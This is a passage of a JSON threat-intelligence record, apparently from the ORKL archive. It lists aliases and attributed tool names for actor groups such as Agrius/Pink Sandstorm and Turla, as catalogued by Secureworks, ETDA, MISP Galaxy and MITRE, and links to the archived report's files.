			"created_at": "2025-08-07T02:03:24.783147Z",
			"updated_at": "2026-04-10T02:00:03.664754Z",
			"deleted_at": null,
			"main_name": "COBALT SHADOW",
			"aliases": [
				"AMERICIUM ",
				"Agonizing Serpens ",
				"Agrius",
				"Agrius ",
				"BlackShadow",
				"DEV-0227 ",
				"Justice Blade ",
				"Malek Team",
				"Malek Team ",
				"MoneyBird ",
				"Pink Sandstorm ",
				"Sharp Boyz ",
				"Spectral Kitten "
			],
			"source_name": "Secureworks:COBALT SHADOW",
			"tools": [
				"Apostle",
				"DEADWOOD",
				"Fantasy wiper",
				"IPsec Helper",
				"MiniDump",
				"Moneybird ransomware",
				"Sandals",
				"SecretsDump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4023e661-f566-4b5b-a06f-9d370403f074",
			"created_at": "2024-02-02T02:00:04.064685Z",
			"updated_at": "2026-04-10T02:00:03.547155Z",
			"deleted_at": null,
			"main_name": "Pink Sandstorm",
			"aliases": [
				"AMERICIUM",
				"BlackShadow",
				"DEV-0022",
				"Agrius",
				"Agonizing Serpens",
				"UNC2428",
				"Black Shadow",
				"SPECTRAL KITTEN"
			],
			"source_name": "MISPGALAXY:Pink Sandstorm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bacb81f4-18d1-4dcd-b277-65a9dac41b61",
			"created_at": "2023-11-04T02:00:07.680044Z",
			"updated_at": "2026-04-10T02:00:03.390891Z",
			"deleted_at": null,
			"main_name": "GoldenJackal",
			"aliases": [],
			"source_name": "MISPGALAXY:GoldenJackal",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7d982d5b-3428-483c-8804-c3ab774f1861",
			"created_at": "2024-11-01T02:00:52.70975Z",
			"updated_at": "2026-04-10T02:00:05.357255Z",
			"deleted_at": null,
			"main_name": "Agrius",
			"aliases": [
				"Agrius",
				"Pink Sandstorm",
				"AMERICIUM",
				"Agonizing Serpens",
				"BlackShadow"
			],
			"source_name": "MITRE:Agrius",
			"tools": [
				"NBTscan",
				"Mimikatz",
				"IPsec Helper",
				"Moneybird",
				"MultiLayer Wiper",
				"DEADWOOD",
				"BFG Agonizer",
				"ASPXSpy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434907,
	"ts_updated_at": 1775826685,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/99f08a2d3b149cfb0a3fde372f77fcfa66f5face.pdf",
		"text": "https://archive.orkl.eu/99f08a2d3b149cfb0a3fde372f77fcfa66f5face.txt",
		"img": "https://archive.orkl.eu/99f08a2d3b149cfb0a3fde372f77fcfa66f5face.jpg"
	}
}